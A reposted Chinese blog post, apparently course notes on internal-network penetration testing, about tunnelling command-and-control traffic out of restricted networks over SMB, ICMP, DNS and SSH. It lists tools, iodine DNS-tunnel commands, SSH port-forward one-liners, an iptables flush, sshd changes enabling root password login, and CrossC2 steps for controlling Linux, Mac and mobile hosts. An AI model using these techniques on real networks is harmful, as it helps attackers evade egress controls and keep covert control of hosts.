0
0

第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

在这里插入图片描述

知识点

  1. #知识点:1、入站规则不出网上线方案
  2. 2、出站规则不出网上线方案
  3. 3、隧道技术-SMB&ICMP&DNS&SSH
  4. 4、控制上线-Linux&Mac&IOS&Android
  6. -连接方向:正向&反向(基础课程有讲过)
  7. -内网穿透:解决网络控制上线&网络通讯问题
  8. -隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
  9. -代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
  11. #系列点:1、判断什么时候用代理
  12. 2、判断什么时候用隧道
  13. 3、判断出网和不出网协议
  14. 4、如何使用代理建立节点并连接
  15. 5、如何使用隧道技术封装协议上线
  16. 6、判断哪些代理或隧道情况选择放弃

在这里插入图片描述
在这里插入图片描述

演示案例

  1. 1、隧道技术-SMB协议-判断&通讯&上线
  2. 2、隧道技术-ICMP协议-判断&通讯&上线
  3. 3、隧道技术-DNS协议-判断&通讯&上线
  4. 4、隧道技术-SSH协议-判断&通讯&上线
  5. 5、控制上线-插件-Linux&Mac&IOS&Android
  1. 1、判断出网协议
  2. 2、使用出网协议建立隧道
  4. #SMB隧道&通讯&上线
  5. 判断:445通讯
  6. 上线:借助通讯后绑定上线
  7. 通讯:直接SMB协议通讯即可
  9. #ICMP隧道&通讯&上线
  10. 判断:ping命令
  11. 上线:见前面课程
  12. 通讯:其他项目(icmpsh icmptunnel)
  13. https://github.com/esrrhs/spp
  14. https://github.com/bdamele/icmpsh
  15. https://github.com/esrrhs/pingtunnel
  17. #DNS隧道&通讯&上线
  18. 判断:nslookup dig1、上线环境:内网主机只出网DNS协议数据,解决上线
  19. -域名申请及配置
  20. -监听器创建及配置
  21. -后门绑定监听器及生成
  22. 2、通讯环境:
  23. 内网主机只出网DNS协议数据,解决通讯
  24. https://github.com/yarrick/iodine
  25. 判断出网:nslookup www.baidu.com
  26. -服务器:设置密码xiaodi并创建虚拟IP及绑定域名指向
  27. iodined -f-c-P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD
  28. 设置密码xiaodi并创建虚拟IP及绑定域名指向
  29. -客户端:连接密码xiaodi并绑定域名指向
  30. iodine -f-M200-P xiaodi ns1.xiaodi8.com
  31. -尝试通讯尝试连接:
  32. ssh root@192.168.0.2
  34. #SSH隧道&通讯
  35. 判断:ssh连接
  36. 1、上线:
  37. 由于CSSSH协议监听器配置,无法上线
  38. 2、通讯:
  39. 由于SSH协议存在于Linux系统,跳板机必须Linux
  40. iptables -F /* 清除所有规则 */
  41. iptables -A INPUT -p tcp --dport22-j ACCEPT /*允许包从22端口进入*/
  42. iptables -A OUTPUT -p tcp --sport22-m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
  43. iptables -A OUTPUT -p udp --dport53-j ACCEPT /* 域名解析端口,一般不开 */
  44. iptables -A INPUT -p udp --sport53-j ACCEPT /* 域名解析端口,一般不开 */
  45. iptables -A INPUT -s127.0.0.1 -d127.0.0.1 -j ACCEPT /*允许本机访问本机*/
  46. iptables -A OUTPUT -s127.0.0.1 -d127.0.0.1 -j ACCEPT
  47. iptables -A INPUT -p tcp -s0/0 --dport80-j ACCEPT /*允许所有IP访问80端口*/
  48. iptables -A OUTPUT -p tcp --sport80-m state --state ESTABLISHED -j ACCEPT
  49. iptables-save > /etc/sysconfig/iptables /*保存配置*/
  50. iptables -L /* 显示iptables列表 */
  52. 开启ssh协议登录:
  53. vi /etc/ssh/sshd_config
  54. PermitRootLogin yes
  55. PasswordAuthentication yes
  56. /etc/init.d/ssh start
  57. /etc/init.d/ssh restart
  58. 本地:出站封
  59. ssh-CfNg-L1122:192.168.1.15:8080 root@192.168.1.166
  60. curl http://127.0.0.1:1122
  61. 远程:入站封
  62. ssh-CfNg-R1234:192.168.1.15:8080 root@47.94.236.117
  63. curl http://127.0.0.1:1234
  65. #控制上线-插件-Linux&Mac&IOS&Android
  66. https://github.com/gloxec/CrossC2
  67. 面向Linux Mac IOS Android系统上线支持
  68. 1、插件使用
  69. 2、命令使用
  70. 使用参考:
  71. https://gloxec.github.io/CrossC2/zh_cn/
  72. 目前版本只支持反向的https和正向的tcp
  73. 1、下载对应版本加载器和CNA插件
  74. 2、上传加载器文件和本地加载CNA插件
  75. 3、修改CNA插件配置路径及上传Key文件
  76. 4、使用命令或插件绑定HTTPS监听器生成
标签: 安全 ssh linux
本文转载自: https://blog.csdn.net/qq_46081990/article/details/132095060
版权归原作者 Ch4ser 所有, 如有侵权,请联系我们删除。
登录后发布评论

“第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

网络安全法-网络运行安全

使用selenium/drissionpage时如何阻止chrome自动跳转http到https

docker desktop 里部署的Open WebUI 管理员密码忘记了的处理方法

在ubuntu20.04中搭建onsite比赛运行环境

利用开源的低代码表单设计器FcDesigner高效管理和渲染复杂表单结构

Kafka学习笔记

【前端】浏览器输入url到页面呈现发生了什么?

文章导航
没有找到文章内容分段。。。